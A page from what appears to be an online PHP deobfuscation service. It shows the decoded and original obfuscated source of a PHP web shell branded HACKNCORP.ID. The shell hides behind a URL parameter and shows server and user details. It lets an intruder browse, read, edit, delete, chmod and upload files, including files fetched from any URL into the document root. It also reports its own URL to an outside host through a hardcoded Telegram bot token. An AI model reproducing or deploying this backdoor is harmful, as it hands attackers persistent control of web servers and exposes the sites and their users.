Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto four3; eO9g9: $k3yw = base64_decode("\101\143\x4c\123\106\116\151\x76\107\x58\157\x35..

Decoded Output download

<?  goto four3; eO9g9: $k3yw = base64_decode("AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4"); goto hvzQE; v9NDe: echo "<div id="content"><table width="900" border="0" cellpadding="4" cellspacing="3" align="center">\xa<tr class="first">\xa<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>\xa<td><center>Options</center></td>
</tr>"; goto sewi_; JzO5I: $result = curl_exec($ch); goto iuGF7; lhEsK: echo "User : <font color='gold'>" . @get_current_user() . "&nbsp;</font>( <font color='gold'>" . @getmyuid() . "</font>)<br>"; goto Pe2_p; MnKAO: echo "<center>"; goto LB5zI; NAJvl: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto JzO5I; LubWg: $cur = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vyfH2; pdvy9: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto BA2Al; JRP2Z: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto lhEsK; LB5zI: echo "</td></tr><tr><td><br>"; goto gHA4V; z_vNP: curl_setopt($ch, CURLOPT_POST, 1); goto hN0xR; TLaGi: $message = "Result Shell : " . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"]; goto zDUP9; NrtF0: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?HC&path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?HC&path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto MnKAO; FLNg3: $result = file_get_contents($k3yw, false, $context); goto NrtF0; TghRS: echo "<center>"; goto lp0wi; sasia: $token = "bot6790178447:AAE_hV1KmtjozxpbXfbD_KYvcLTxconofmw"; goto k9owL; Pe2_p: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto pR3me; sMpwZ: $context = stream_context_create($options); goto FLNg3; WvImC: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto tZbA7; vyfH2: $data = array("file_url" => $cur); goto g0A7K; BA2Al: echo "Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto JRP2Z; hN0xR: curl_setopt($ch, CURLOPT_POSTFIELDS, $data); goto NAJvl; spDvV: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='read'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto WvImC; gHA4V: if (isset($_POST["upwkwk"])) { if (isset($_POST["berkasnya"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! &nbsp;<font color='green'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! &nbsp;<font color='green'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto TghRS; Qnf71: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "s"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "l"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "-"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "b"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "d"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "c"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "p"; } else { $ingfo = "u"; } $ingfo .= $statusnya & 256 ? "r" : "-"; $ingfo .= $statusnya & 128 ? "w" : "-"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "s" : "x" : ($statusnya & 2048 ? "S" : "-"); $ingfo .= $statusnya & 32 ? "r" : "-"; $ingfo .= $statusnya & 16 ? "w" : "-"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "s" : "x" : ($statusnya & 1024 ? "S" : "-"); $ingfo .= $statusnya & 4 ? "r" : "-"; $ingfo .= $statusnya & 2 ? "w" : "-"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "t" : "x" : ($statusnya & 512 ? "T" : "-"); return $ingfo; } goto dfOgI; ZFJnL: if ($result) { $response = json_decode($result, true); if ($response["ok"]) { echo " "; } else { echo "Error: " . $response["description"]; } } else { echo " "; } goto Xg5lq; iYr62: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
<td><a href="?HC&fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>
<td><center>" . $size . "</center></td>\xa<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>
<form method="post" action="?HC&pilihan&path={$lokasi}">
<select name="pilih">
<option value=""></option>
<option value="hapus">Delete</option>
<option value="ubahmod">Chm0d</option>\xa<option value="gantinama">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">
<input type="hidden" name="path" value="{$lokasi}/{$file}">
<input type="submit" class="gas" value=">" />
</center></form></td>\xa</tr>"; } goto TwlMw; four3: if (!isset($_GET["HC"])) { die; } goto DAH4_; hvzQE: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto qdTCi; La4om: if (empty($disfunc)) { $disf = "<font color='green'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto jyBT8; zDUP9: $apiUrl = "https://api.telegram.org/bot6790178447:AAE_hV1KmtjozxpbXfbD_KYvcLTxconofmw/sendMessage"; goto b81X6; yTH2m: echo "</table><br>"; goto HhzL8; bAsUf: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto eO9g9; TwlMw: echo "</tr></td></table></table>"; goto TiIoC; iuGF7: curl_close($ch); goto ZFJnL; Xg5lq: set_time_limit(0); goto b5hLE; lp0wi: echo "Upload File : "; goto n2Y1_; GnnL3: $lokasis = explode("/", $lokasi); goto ZQjip; JKAYa: $ch = curl_init($apiUrl); goto z_vNP; OY_3w: echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; goto iYr62; n2Y1_: echo "<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]
<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]\xa<br>\xa<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>\xa<input type="text" name="darilink" class="up" placeholder="Link File">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">\xa</center>
</form>"; goto yTH2m; qdTCi: $lokasi = str_replace("\", "/", $lokasi); goto GnnL3; oPKxL: $disfunc = @ini_get("disable_functions"); goto La4om; jyBT8: function author() { echo "<center><br>COPYRIGHT &copy <a target='_blank' href='https://hackncorp.id/'>HACKNCORP.ID</a></center>"; die; } goto spDvV; tZbA7: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto CRstk; gvQv_: echo "Directory : &nbsp;"; goto bAsUf; g0A7K: $options = array("http" => array("method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded", "content" => http_build_query($data))); goto sMpwZ; pR3me: echo "Disable Function : " . $disf . "</font><br>"; goto gvQv_; HhzL8: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
	Permission : <input name="perm" type="text" class="up" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />\xa	<input type="hidden" name="path" value="" . $_POST["path"] . "">
\x9<input type="hidden" name="pilih" value="ubahmod">\xa	<input type="submit" value="Change" name="chm0d" class="up" style="cursor: pointer; border-color: #05a181"/>\xa	</form>"; if (isset($_POST["chm0d"])) { $cm = @chmod($_POST["path"], $_POST["perm"]); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
\x9New Name : <input name="newname" type="text" class="up" size="20" value="" . $namaawal . "" />\xa	<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa	<input type="hidden" name="pilih" value="gantinama">\xa\x9<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #05a181"/>
\x9</form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">
\x9<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
\x9<input type="hidden" name="path" value="" . $_POST["path"] . "">
\x9<input type="hidden" name="pilih" value="edit">
	<input type="submit" value="Edit File" name="gasedit" />\xa\x9</form><br>"; } goto v9NDe; TiIoC: author(); goto Qnf71; DAH4_: ?>

Did this file decode correctly?

Original Code

goto four3; eO9g9: $k3yw = base64_decode("\101\143\x4c\123\106\116\151\x76\107\x58\157\x35\104\156\157\x50\161\x41\144\x56\170\x48\x42\x37\161\121\x72\x55\x76\170\152\x67\x58\170\x6d\162\107\x68\x45\x46\x48\x36\166\x34"); goto hvzQE; v9NDe: echo "\74\x64\151\166\x20\x69\144\75\42\x63\157\156\164\145\156\x74\x22\x3e\x3c\164\x61\142\154\145\40\167\151\x64\164\x68\75\42\71\60\60\x22\x20\x62\x6f\162\144\x65\x72\75\42\x30\x22\40\x63\145\154\154\160\141\x64\x64\x69\x6e\x67\75\x22\64\42\40\x63\145\154\x6c\x73\160\x61\143\x69\156\x67\x3d\x22\x33\x22\40\x61\154\x69\147\156\75\x22\x63\x65\x6e\x74\x65\x72\42\76\xa\x3c\x74\162\x20\143\154\141\x73\x73\75\42\146\x69\162\163\x74\42\76\xa\74\164\x64\76\74\143\145\156\x74\x65\162\76\x4e\141\x6d\145\74\57\143\145\156\164\x65\x72\x3e\74\x2f\x74\144\76\12\x3c\x74\x64\x3e\x3c\x63\145\x6e\x74\x65\x72\76\x53\151\172\145\74\x2f\x63\x65\156\164\x65\162\x3e\x3c\x2f\x74\x64\76\12\74\164\x64\x3e\x3c\143\145\156\164\145\162\76\x50\145\x72\x6d\x69\163\x73\151\157\156\163\74\57\x63\145\x6e\x74\x65\162\76\x3c\57\x74\x64\x3e\xa\x3c\164\x64\x3e\74\143\145\156\x74\145\x72\76\x4f\160\x74\151\x6f\x6e\x73\74\x2f\143\x65\156\164\145\x72\76\x3c\57\164\144\76\12\74\57\x74\162\x3e"; goto sewi_; JzO5I: $result = curl_exec($ch); goto iuGF7; lhEsK: echo "\x55\163\145\x72\40\x3a\x20\74\146\x6f\x6e\x74\x20\143\x6f\154\x6f\x72\x3d\x27\x67\157\x6c\144\47\x3e" . @get_current_user() . "\x26\156\x62\x73\x70\73\74\x2f\x66\x6f\156\164\x3e\50\40\x3c\146\157\156\x74\x20\143\157\154\157\162\75\47\147\x6f\x6c\144\x27\76" . @getmyuid() . "\74\x2f\x66\x6f\x6e\164\x3e\x29\74\142\162\x3e"; goto Pe2_p; MnKAO: echo "\74\143\145\156\164\145\162\76"; goto LB5zI; NAJvl: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto JzO5I; LubWg: $cur = "\x68\164\164\x70\72\57\57" . $_SERVER["\110\124\x54\120\x5f\110\x4f\x53\124"] . $_SERVER["\122\105\x51\125\105\x53\x54\137\125\x52\x49"]; goto vyfH2; pdvy9: function red($text) { echo "\x3c\143\x65\156\x74\145\162\x3e\74\146\157\x6e\164\x20\x63\157\x6c\157\x72\x3d\x27\162\145\x64\47\x3e" . $text . "\74\x2f\143\x65\156\x74\145\x72\76\x3c\x2f\146\157\156\164\76"; } goto BA2Al; JRP2Z: echo "\123\x79\163\164\x65\x6d\40\72\40\x3c\146\157\156\164\40\143\x6f\x6c\x6f\162\75\47\x67\x6f\154\x64\47\76" . php_uname() . "\x3c\57\x66\x6f\156\x74\76\x3c\142\x72\x3e"; goto lhEsK; LB5zI: echo "\74\57\x74\x64\76\74\57\x74\x72\76\x3c\164\162\76\x3c\x74\144\76\74\x62\x72\76"; goto gHA4V; z_vNP: curl_setopt($ch, CURLOPT_POST, 1); goto hN0xR; TLaGi: $message = "\122\x65\x73\165\x6c\x74\40\x53\150\x65\154\x6c\x20\72\x20" . $_SERVER["\110\x54\x54\x50\137\110\117\123\124"] . $_SERVER["\x50\110\120\137\123\x45\x4c\106"]; goto zDUP9; NrtF0: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "\74\x61\x20\x68\x72\x65\x66\75\42\77\110\x43\46\160\141\164\x68\75\x2f\x22\x3e\x2f\74\57\141\x3e"; continue; } if ($lok == '') { continue; } echo "\x3c\x61\x20\150\162\x65\x66\x3d\x22\x3f\110\103\46\160\x61\x74\150\75"; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\x22\76" . $lok . "\74\57\x61\76\x2f"; } goto MnKAO; FLNg3: $result = file_get_contents($k3yw, false, $context); goto NrtF0; TghRS: echo "\x3c\143\x65\x6e\x74\x65\x72\76"; goto lp0wi; sasia: $token = "\142\157\164\x36\x37\71\60\61\x37\x38\x34\x34\67\x3a\101\101\105\x5f\x68\126\61\x4b\x6d\x74\x6a\157\x7a\170\x70\x62\130\x66\142\x44\137\113\131\166\x63\x4c\x54\x78\143\x6f\156\157\146\x6d\x77"; goto k9owL; Pe2_p: echo "\120\110\x50\x20\126\145\x72\x73\151\x6f\156\40\x3a\x20\x3c\x66\157\x6e\164\x20\143\157\x6c\x6f\x72\x3d\x27\147\157\154\x64\47\76" . @phpversion() . "\74\57\146\157\x6e\x74\76\74\142\x72\76"; goto pR3me; sMpwZ: $context = stream_context_create($options); goto FLNg3; WvImC: function cekroot() { if (is_writable($_SERVER["\x44\x4f\103\x55\x4d\x45\x4e\124\137\122\x4f\117\x54"])) { return "\74\146\157\156\164\x20\143\x6f\x6c\157\162\75\47\147\162\145\145\156\x27\x3e\x57\x72\x69\x74\145\x61\142\154\145\74\57\x66\x6f\x6e\164\x3e"; } else { return "\x3c\146\157\x6e\x74\40\143\157\x6c\x6f\162\x3d\47\x72\x65\x64\x27\76\x57\162\x69\x74\x65\x61\142\154\x65\x3c\57\x66\157\156\164\x3e"; } } goto tZbA7; vyfH2: $data = array("\146\151\x6c\145\137\x75\162\x6c" => $cur); goto g0A7K; BA2Al: echo "\123\x65\162\166\145\x72\40\72\40\74\146\x6f\156\164\x20\x63\x6f\154\157\x72\x3d\47\x67\x6f\154\144\47\76" . $_SERVER["\x53\105\x52\126\x45\122\137\x53\x4f\106\124\x57\x41\122\105"] . "\74\57\x66\157\x6e\x74\76\x3c\142\162\x3e"; goto JRP2Z; hN0xR: curl_setopt($ch, CURLOPT_POSTFIELDS, $data); goto NAJvl; spDvV: function cekdir() { if (isset($_GET["\160\x61\164\x68"])) { $lokasi = $_GET["\x70\x61\x74\x68"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "\74\x66\157\x6e\164\x20\x63\x6f\x6c\x6f\162\x3d\x27\162\145\x61\144\x27\76\x57\162\x69\164\x65\141\x62\154\145\74\x2f\146\157\156\x74\x3e"; } else { return "\x3c\146\x6f\156\164\40\x63\157\154\157\x72\x3d\47\162\145\144\47\76\x57\162\x69\x74\145\141\x62\154\x65\74\57\146\x6f\156\164\x3e"; } } goto WvImC; gHA4V: if (isset($_POST["\x75\x70\167\153\167\x6b"])) { if (isset($_POST["\142\145\162\153\x61\x73\156\171\x61"])) { if ($_POST["\144\x69\x72\156\171\141"] == "\x32") { $lokasi = $_SERVER["\104\x4f\x43\125\115\105\x4e\x54\x5f\122\x4f\117\x54"]; } $data = @file_put_contents($lokasi . "\x2f" . $_FILES["\x62\x65\162\153\x61\163"]["\156\x61\155\x65"], @file_get_contents($_FILES["\x62\x65\x72\153\141\163"]["\x74\155\x70\137\x6e\x61\x6d\145"])); if (file_exists($lokasi . "\57" . $_FILES["\x62\145\x72\153\141\x73"]["\156\x61\x6d\145"])) { echo "\106\x69\x6c\x65\40\x55\160\154\157\x61\144\x65\144\40\41\x20\x26\156\142\163\160\x3b\74\146\157\x6e\x74\40\x63\157\154\157\162\x3d\x27\147\162\145\145\x6e\x27\x3e\74\x69\76" . $lokasi . "\x2f" . $_FILES["\x62\145\162\153\x61\x73"]["\x6e\x61\155\145"] . "\74\57\151\x3e\74\x2f\x66\157\x6e\164\x3e\x3c\x62\162\76\74\142\162\x3e"; } else { echo "\x3c\146\x6f\x6e\164\x20\x63\x6f\x6c\157\162\75\47\162\x65\144\47\76\106\x61\x69\x6c\x65\144\40\x74\157\x20\x55\160\154\157\x61\x64\x20\41\x3c\x62\x72\x3e\74\x62\x72\76"; } } elseif (isset($_POST["\154\151\156\x6b\156\171\x61"])) { if (empty($_POST["\x6e\x61\x6d\141\x6c\x69\x6e\x6b"])) { die("\x46\x69\154\x65\156\x61\155\x65\x20\x63\141\156\x6e\157\x74\40\x62\145\x20\x65\155\x70\164\171\x20\x21"); } if ($_POST["\x64\151\162\x6e\171\x61"] == "\x32") { $lokasi = $_SERVER["\104\117\103\125\x4d\105\116\x54\x5f\122\x4f\x4f\124"]; } $data = @file_put_contents($lokasi . "\57" . $_POST["\x6e\141\155\141\x6c\x69\x6e\x6b"], @file_get_contents($_POST["\x64\x61\162\151\x6c\x69\x6e\x6b"])); if (file_exists($lokasi . "\x2f" . $_POST["\x6e\x61\155\x61\154\x69\156\153"])) { echo "\106\x69\154\x65\x20\x55\160\154\x6f\141\x64\145\x64\40\41\40\x26\x6e\142\163\160\73\74\146\157\156\x74\40\143\x6f\x6c\157\x72\75\x27\147\162\x65\x65\x6e\47\x3e\x3c\151\x3e" . $lokasi . "\x2f" . $_POST["\156\141\x6d\141\154\151\156\153"] . "\x3c\57\x69\76\74\x2f\146\x6f\156\164\x3e\74\142\x72\76\x3c\142\162\x3e"; } else { echo "\x3c\146\x6f\x6e\164\40\x63\157\154\x6f\145\x3d\x27\162\145\x64\47\76\106\141\151\x6c\x65\x64\40\164\x6f\40\125\160\154\157\x61\x64\x20\41\74\x62\x72\76\x3c\142\x72\76"; } } } goto TghRS; Qnf71: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "\x73"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "\154"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "\55"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "\x62"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "\x64"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "\x63"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "\x70"; } else { $ingfo = "\x75"; } $ingfo .= $statusnya & 256 ? "\162" : "\55"; $ingfo .= $statusnya & 128 ? "\167" : "\55"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "\163" : "\x78" : ($statusnya & 2048 ? "\123" : "\55"); $ingfo .= $statusnya & 32 ? "\162" : "\x2d"; $ingfo .= $statusnya & 16 ? "\x77" : "\55"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "\x73" : "\170" : ($statusnya & 1024 ? "\x53" : "\55"); $ingfo .= $statusnya & 4 ? "\x72" : "\55"; $ingfo .= $statusnya & 2 ? "\x77" : "\55"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "\x74" : "\x78" : ($statusnya & 512 ? "\124" : "\x2d"); return $ingfo; } goto dfOgI; ZFJnL: if ($result) { $response = json_decode($result, true); if ($response["\157\x6b"]) { echo "\40"; } else { echo "\x45\162\162\157\x72\x3a\x20" . $response["\x64\145\163\143\x72\151\x70\x74\151\x6f\x6e"]; } } else { echo "\40"; } goto Xg5lq; iYr62: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}\57{$file}")) { continue; } $size = filesize("{$lokasi}\57{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\x4d\102"; } else { $size = $size . "\40\x4b\102"; } echo "\74\x74\x72\x3e\12\74\164\x64\x3e\x3c\141\x20\x68\x72\145\146\75\42\x3f\x48\x43\46\146\x69\x6c\x65\x6c\157\143\x3d{$lokasi}\x2f{$file}\46\160\141\x74\150\x3d{$lokasi}\x22\76{$file}\74\x2f\141\x3e\x3c\x2f\x74\144\76\12\74\164\144\76\x3c\143\x65\156\164\145\162\x3e" . $size . "\74\57\143\145\x6e\164\x65\162\76\x3c\x2f\164\144\76\xa\x3c\x74\144\76\74\x63\x65\x6e\164\x65\x72\76"; if (is_writable("{$lokasi}\57{$file}")) { echo "\x3c\146\x6f\x6e\x74\40\143\157\x6c\x6f\162\x3d\42\147\x72\145\x65\x6e\x22\76"; } elseif (!is_readable("{$lokasi}\57{$file}")) { echo "\x3c\146\x6f\156\x74\x20\x63\x6f\x6c\x6f\162\x3d\42\x72\x65\144\x22\76"; } echo statusnya("{$lokasi}\57{$file}"); if (is_writable("{$lokasi}\x2f{$file}") || !is_readable("{$lokasi}\57{$file}")) { echo "\74\x2f\x66\x6f\156\164\x3e"; } echo "\x3c\57\143\145\x6e\164\145\x72\x3e\74\x2f\x74\144\76\x3c\x74\x64\76\x3c\x63\x65\156\164\145\x72\x3e\12\x3c\146\157\x72\x6d\40\155\x65\164\x68\157\x64\75\42\x70\157\x73\x74\42\40\141\x63\164\151\x6f\x6e\x3d\x22\x3f\x48\103\46\x70\x69\154\x69\x68\141\x6e\46\160\141\x74\x68\75{$lokasi}\x22\x3e\12\74\163\145\x6c\x65\x63\164\x20\156\141\155\145\x3d\x22\x70\151\x6c\151\x68\x22\76\12\x3c\x6f\160\164\x69\157\156\x20\166\141\154\165\x65\75\x22\x22\x3e\74\57\x6f\x70\x74\x69\157\x6e\76\12\x3c\x6f\160\x74\x69\x6f\156\x20\x76\141\x6c\165\x65\75\x22\x68\141\x70\x75\163\x22\76\104\145\154\x65\164\145\x3c\x2f\x6f\160\164\x69\157\x6e\x3e\12\74\157\160\x74\151\x6f\156\x20\166\141\154\x75\145\x3d\42\165\142\141\x68\x6d\x6f\144\42\76\x43\150\x6d\60\x64\74\57\x6f\160\164\151\x6f\x6e\76\xa\x3c\157\x70\x74\151\x6f\x6e\40\166\x61\x6c\x75\145\75\42\x67\x61\156\164\151\x6e\141\155\x61\42\76\122\x65\156\141\x6d\145\x3c\57\157\160\x74\x69\157\156\x3e\12\x3c\x6f\x70\164\x69\157\156\40\x76\x61\x6c\x75\x65\x3d\x22\x65\144\151\x74\42\76\x45\x64\x69\x74\x3c\57\157\x70\x74\x69\x6f\156\x3e\12\74\57\163\145\x6c\145\x63\164\76\12\x3c\x69\x6e\x70\165\x74\40\x74\x79\160\145\x3d\x22\150\x69\x64\144\x65\156\x22\x20\x6e\x61\x6d\145\x3d\42\164\171\x70\x65\42\x20\166\141\154\165\x65\75\x22\x66\x69\154\145\x22\x3e\xa\74\151\x6e\x70\x75\164\x20\164\171\x70\145\x3d\x22\150\151\144\144\x65\156\x22\x20\x6e\141\x6d\x65\75\42\x6e\x61\x6d\x65\42\40\166\141\x6c\x75\145\x3d\42{$file}\x22\76\12\x3c\151\156\160\165\x74\40\164\171\x70\x65\x3d\42\150\151\x64\144\x65\156\x22\40\156\141\155\x65\x3d\x22\x70\x61\164\x68\x22\x20\166\141\x6c\x75\145\x3d\42{$lokasi}\x2f{$file}\42\76\12\74\151\x6e\x70\x75\x74\40\x74\171\x70\145\75\x22\x73\165\x62\155\x69\x74\42\x20\x63\x6c\x61\163\x73\75\x22\147\x61\x73\42\x20\x76\x61\x6c\x75\x65\x3d\x22\x3e\x22\x20\57\76\12\x3c\x2f\143\145\156\164\x65\x72\x3e\x3c\57\146\x6f\x72\155\76\x3c\57\x74\x64\x3e\xa\x3c\57\x74\x72\76"; } goto TwlMw; four3: if (!isset($_GET["\110\x43"])) { die; } goto DAH4_; hvzQE: if (isset($_GET["\160\x61\x74\x68"])) { $lokasi = $_GET["\160\141\x74\150"]; $lokdua = $_GET["\160\x61\x74\x68"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto qdTCi; La4om: if (empty($disfunc)) { $disf = "\74\146\157\156\164\40\x63\x6f\x6c\x6f\x72\75\x27\x67\162\145\x65\156\x27\76\x4e\117\x4e\105\x3c\57\x66\x6f\156\164\76"; } else { $disf = "\x3c\x66\157\x6e\164\x20\143\x6f\x6c\x6f\162\75\47\x72\x65\x64\x27\76" . $disfunc . "\74\x2f\x66\x6f\x6e\x74\76"; } goto jyBT8; zDUP9: $apiUrl = "\150\164\x74\x70\x73\x3a\x2f\x2f\141\x70\x69\x2e\x74\x65\x6c\145\147\162\x61\x6d\56\157\162\x67\57\142\157\x74\66\67\71\60\61\67\x38\x34\x34\x37\72\101\101\x45\x5f\x68\x56\61\113\x6d\164\152\157\172\x78\x70\x62\130\x66\142\104\137\x4b\131\166\x63\114\124\170\143\157\156\x6f\146\155\x77\57\163\145\156\x64\x4d\x65\x73\x73\141\147\145"; goto b81X6; yTH2m: echo "\x3c\x2f\164\141\x62\154\x65\76\74\142\x72\x3e"; goto HhzL8; bAsUf: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto eO9g9; TwlMw: echo "\74\57\x74\162\76\74\x2f\164\144\x3e\x3c\57\x74\141\x62\x6c\145\x3e\x3c\x2f\164\141\142\154\145\76"; goto TiIoC; iuGF7: curl_close($ch); goto ZFJnL; Xg5lq: set_time_limit(0); goto b5hLE; lp0wi: echo "\125\160\x6c\x6f\x61\x64\40\x46\x69\154\145\x20\72\x20"; goto n2Y1_; GnnL3: $lokasis = explode("\x2f", $lokasi); goto ZQjip; JKAYa: $ch = curl_init($apiUrl); goto z_vNP; OY_3w: echo "\74\164\x72\x20\143\154\x61\x73\x73\75\42\x66\151\x72\163\164\42\76\x3c\x74\144\76\74\57\x74\x64\76\x3c\x74\144\x3e\74\x2f\164\144\x3e\74\164\x64\x3e\74\57\164\x64\76\74\164\144\x3e\74\57\164\x64\x3e\x3c\x2f\x74\x72\x3e"; goto iYr62; n2Y1_: echo "\x3c\146\157\x72\155\x20\145\156\143\x74\171\x70\145\75\x22\155\165\x6c\x74\151\160\141\162\164\57\146\157\x72\x6d\x2d\144\141\x74\x61\x22\x20\155\x65\164\x68\157\144\x3d\42\160\x6f\163\164\x22\76\12\74\151\156\160\x75\164\40\x74\x79\160\145\x3d\42\162\141\x64\151\x6f\x22\40\x76\141\x6c\165\x65\75\x22\61\42\40\x6e\x61\x6d\x65\x3d\x22\x64\x69\x72\156\171\141\42\x20\x63\x68\x65\x63\x6b\145\144\76\143\165\162\x72\x65\156\164\x5f\144\x69\162\40\x5b\40" . cekdir() . 